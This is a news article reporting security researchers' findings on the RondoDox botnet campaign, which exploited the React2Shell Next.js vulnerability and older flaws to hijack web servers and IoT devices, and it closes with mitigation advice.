Cybersecurity researchers have revealed details of a persistent nine-month campaign in which Internet of Things devices and web servers were targeted to recruit them into the RondoDox botnet. Observed activity through December 2025 indicates that the attackers exploited the recently disclosed React2Shell vulnerability, tracked as CVE-2025-55182 with a CVSS score of 10.0, to gain initial access. React2Shell affects React Server Components and Next.js, enabling unauthenticated attackers to execute remote commands on susceptible servers. According to Shadowserver Foundation data, approximately 90,300 instances remained vulnerable as of December 31, 2025, with the largest concentration in the U.S. at 68,400, followed by Germany, France, and India.
RondoDox, which first emerged in early 2025, has steadily expanded its toolkit, incorporating multiple N-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893, to broaden the botnet’s reach. Researchers from CloudSEK outlined that the campaign progressed through three phases prior to the exploitation of React2Shell: initial reconnaissance and manual vulnerability scanning between March and April 2025, daily mass probing of web applications and IoT devices from April through June, and hourly automated deployment at scale from July through early December. Targets included web applications built on WordPress, Drupal, and Struts2, as well as IoT devices such as Wavlink routers, demonstrating the botnet’s focus on both enterprise and consumer devices.
In December 2025, the threat actors initiated scans to identify vulnerable Next.js servers and deployed multiple payloads on compromised systems. These included cryptocurrency miners hosted at “/nuts/poop,” a botnet loader and health checker at “/nuts/bolts,” and a Mirai botnet variant at “/nuts/x86.” The “/nuts/bolts” component is designed to eliminate competing malware, coin miners, and artifacts from previous campaigns, ensuring exclusive control of the infected devices. CloudSEK reported that it continuously scans running processes in “/proc” every 45 seconds, terminating any non-whitelisted executables and establishing persistence via modifications to “/etc/crontab.” This systematic approach enables RondoDox to maintain control and prevent reinfection by rival botnets.
Security experts recommend that organizations mitigate the risk by updating Next.js to patched versions immediately, segmenting IoT devices into dedicated VLANs, deploying Web Application Firewalls, monitoring for unusual process execution, and blocking known command-and-control infrastructure. The RondoDox campaign highlights the growing threat posed by automated botnets that combine web server exploitation with IoT device hijacking to amplify computing resources, mine cryptocurrencies, and maintain persistent access across diverse network environments. Researchers continue to monitor the spread of the botnet and urge enterprises to adopt proactive security measures to prevent compromise of both web-facing applications and connected devices.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
